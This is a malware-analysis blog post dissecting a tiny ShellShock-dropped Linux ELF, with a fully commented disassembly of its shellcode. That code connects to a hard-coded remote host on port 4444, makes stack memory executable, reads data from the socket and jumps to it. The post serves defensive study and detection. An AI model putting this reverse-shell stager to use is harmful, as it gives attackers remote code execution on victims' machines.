The background
In September 2014 during the ShellShock exploitation incidents was in the rush, one of them is the case MMD-0027-2014 of two ELF malware dropped payloads via ShellShock attack, a new malware and a backconnect ELF, with the details can be read in-->[here]
Today I found another interesting ELF x86-32 sample that was reported several hours back, the infection vector is also via ShellShock, the reporter seems was not so sure whether the ELF binary is malicious or not, so I decided to help him dissecting it and blog it here, hoping this information will help security community to use it as reference for the similar case and to mitigate the same pattern of threat in the future.
The ELF binary looks like this:
It is a statically compiled 155 bytes ELF binary in Intel 32bit architecture, by the result of its compilation I can tell that was in a form of shellcode's wrapped C code for Linux compiled in C template on a GCC compiler.
Studying the sample
I fond of shellcodes myself as a hobby, seeing some of these opcodes it suddenly rings a bell and ignoring the ELF header parts away, I can see the shellcode started from 31 db f7 e3 53 43 53 6a 02 b0 66 ..until.. cd 80 ff e1.
Compared to some previous shellcode cases (not in ELF wrapping), this one is shorter, could be a crop of something bigger that was cut to whatever purpose, or a partial module of the threat / bad codes / offensive framework series, or it's a just new small bad code.
Anyhow I decided to check it out, with my beloved tool radare.
Firing up, it looks the binary is having a plain and simple headers, it's safe to go forward, so I move to where the execution code resides. In there, we breakdown the opcodes into a proper assembly, and found that it is straight assembly as per below in x86-32 machine language:
In a glimpse, this shellcode part looks the same to what we had before in Sept 2014, but it is slightly different on the last pats, so let's figure how it is different and how this one works.
Dissection of the evil opcodes
Started from Entry0. I breakdown the codes into its calls & processes, it will take a while working with syscall references, but it is all worth it and the result of reverse engineering is as per pasted commented opcode/assembly codes below:
[0x08048054]> pdf ;-- eip: entry0 (); 0x08048054 | 31db | xor ebx, ebx ; nulling ebx by xor ; 0x08048056 | f7e3 | mul ebx ; nulling ebx by mul 0x08048058 | 53 | push ebx ; push 0 to stack ; from ebx=0x0 (nulled) < IPPROTO_IP 0x08048059 | 43 | inc ebx ; ebx = 0x1 ; socketcall number 1 = sys_socket 0x0804805a | 53 | push ebx ; push 1 to stack < AF_INET 0x0804805b | 6a02 | push 2 ; push 2 to stack < SOCK_STREAM 0x0804805d | b066 | mov al, 0x66 ; syscall number 0x66 sys_socketcall 0x0804805f | 89e1 | mov ecx, esp ; set pointer to arguments array 0x08048061 | cd80 | int 0x80 ; Svc_0; sys_socketcall ; sys_socket 0x08048063 | 97 | xchg eax, edi ; socketfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 0x08048064 | 5b | pop ebx ; clean-up ebx 0x08048065 | 680a00020f | push 0xf02000a ; c2_struct.sin_addr = 15.2.0.10 0x0804806a | 680200115c | push 0x5c110002 ; c2_struct.sin_port = 4444 ; c2_struct.sa_family=AF_INET (2) 0x0804806f | 89e1 | mov ecx, esp ; set pointer for *c2_struct to ecx 0x08048071 | 6a66 | push 0x66 ; push 0x66 to stack (to invoke sys_socketcall) 0x08048073 | 58 | pop eax ; cleanup eax 0x08048074 | 50 | push eax ; eax=0; push 0 to stack 0x08048075 | 51 | push ecx ; push pointer *c2_struct 0x08048076 | 57 | push edi ; push pointer *socketfd 0x08048077 | 89e1 | mov ecx, esp ; set pointer to args arrray (for sys_connect) 0x08048079 | 43 | inc ebx ; ebx = 1 0x0804807a | cd80 | int 0x80 ; Svc_0 ; sys_socketcall => sys_connect 0x0804807c | b207 | mov dl, 7 ; set sys_mprotect prot = 7 (i.e chmod 777 PROT_READ/WRITE/EXEC mem-area) 0x0804807e | b900100000 | mov ecx, 0x1000 ; ecx = 4096 (sys_protect length) 0x08048083 | 89e3 | mov ebx, esp ; set pointer memory *addr for sys_mprotect 0x08048085 | c1eb0c | shr ebx, 0xc ; shift right ebx 0x08048088 | c1e30c | shl ebx, 0xc ; shift left back in, result=buffer up stack by 1348bytes 0x0804808b | b07d | mov al, 0x7d ; syscall number 0x7d = sys_mprotect 0x0804808d | cd80 | int 0x80 ; Svc_0 ; sys_mprotect(void *addr, length, prot) 0x0804808f | 5b | pop ebx ; clear ebx ; restore socket 0x08048090 | 89e1 | mov ecx, esp ; set pointer to mprotect'ed array area exec prot (for sys_read's data) 0x08048092 | 99 | cdq ; zero-out edx 0x08048093 | b60c | mov dh, 0xc ; set size 3072bytes 0x08048095 | b003 | mov al, 3 ; syscall number 0xc sys_read 0x08048097 | cd80 | int 0x80 ; Svc_0 ; sys_read(fd, buffer, count) 0x08048099 | ffe1 | jmp ecx ; jump to pointer of executable memory contains sys_read data to execute (c) reverse engineering original work of @unixfreaxjp, posted first in blog.malwaremustdie.org
The explanation of analysis in English is:
First, this code begins with creating a socket, and use it for an internet connection, socket creation method is sys_socket() that is invoked from sys_socketcall() by socket number "1", and then via (AF_INET) connecting to to a certain host on an IP address and port number (which both are hard coded struct in hex (see the paste above).
This method is called/known as reverse-shell in UNIX nutshell or in the shellcode/exploitation world. Assuming the reverse connection is established to the remote machine, the remote machine upon connected is sending a data, and the received data is stored in victim's machine at an allocated memory in the stack area that will be executed afterward. So we are having an on-memory code execution scheme prepared in this case.
I see same procedure is used in reverse-shell component(s) of a malware or shellcode part in exploitation/post-exploitation framework,
Further, I chanted that, this ELF is happened more or less coded similar at the beginning parts, as previous case I reported in September 2014. But at the bottom part it is coded differently, which is, instead of using /bin/sh to execute the backconnect sent data, it uses the mprotect'ed (English: mapped/allocated memory) space flagged with prot="7" (which means: read/write/exec allowed area), and sys_read will read and save the data at that area to be executed. the execution process are shell operation that's connected from a remote host, hence why it is called reversed-shell.
Some analysis comments
Up to this point I sensed a copy pasta base for this code, whoever used the code that adversary is in the middle of effort to exploit a vulnerability in the targeted machine. If you see this kind of file in your system or traffic, I guarantee there is a bad bad effort in progress..
In this sample the adversary uses ELF instead of shellcode to inject to area in memory, hoping that somehow the lured system will execute the ELF. For that he's trying to be unnoticeable by dropping this little 155 bytes ELF file.
Since the threat is already in the wild folks and I think this offensive binary codes are hard-coded in a lot of post exploitation frameworks too, It would be good to define this ELF threat type well for the blue team and sysadmin to notice it right away.
Behavior analysis
During the "run" process, sysadmins in any infected machine will see some operations triggered by the malware in the kernel space as per processed called below:
↑ And of course, a Linux security feature caused this :)
Some fun moments on naming this malicious sample
Several products may detect this in various naming. The first point is, if they can detect this as malicious object, it sent alerts and it is just fine.
The correct name one maybe, a "backdoor" or "reverse-shell", since a remote attacker is there waiting to get connected and to push data via TCP to be executed in the compromised machine. Reverse-shell It is a famous offensive attacking tool.
Some tagged this as a "downloader", since clearly there is no direct/undirect downloading codes in its binary, I don't feel to agree with the name. Other products named this malware with "GetShell", ...umm..well... it is okay, since it is close enough, but if it goes by that name this far why not use "reverse shell one which is more clearly explaining the purpose? For those antivirus products that named this malware as "ShellLoader"..well, you are a bit too creative! What if the pushed data is not an executable malware but some commands instead? :) That would be a "ShellCommandInjector" too, no? Anyway, good job!
The this naming is important for system engineer or sysadmin to now what kind of threat they are dealing with.
Sometimes it takes efforts to explain what actual names for this malware :-)
The sample, epilogue & follow up
The sample is in Virus Total that can be accessed in here-->[link]
I am also added the Shellshock Shellcode compiles malware to its thread in kernelmode [link]
The radare.org [link] developer team is proven cool, by only reading this post they added feature to check the ip address [link] & also adding the syscall table information [link] for FreeBSD x86-32 on Linux ELF analysis purpose.
For your information I use radare since "radare",like in 2007? It was 1st version (used it since /usr/ports), and our team is the "official" (smile) user for so long[link] w/thank you, and keep on using it happily in all my beloved Demon clusters[link]. Please support them with improvement reports!
Good comments:
.@akochkov @Maijin212 @trufae Okay guys, here's my correction for the syscall table of @radareorg (pic) pic.twitter.com/nSquhLYSUz
— ☩MalwareMustDie (@MalwareMustDie) February 3, 2016
Thank you for your participating to the vote[link] & feedback about to this post:
#MalwareMustDie! | analysis by @unixfreaxjp
"Then you will know the truth, and the truth will set you free.” ☩John 8:32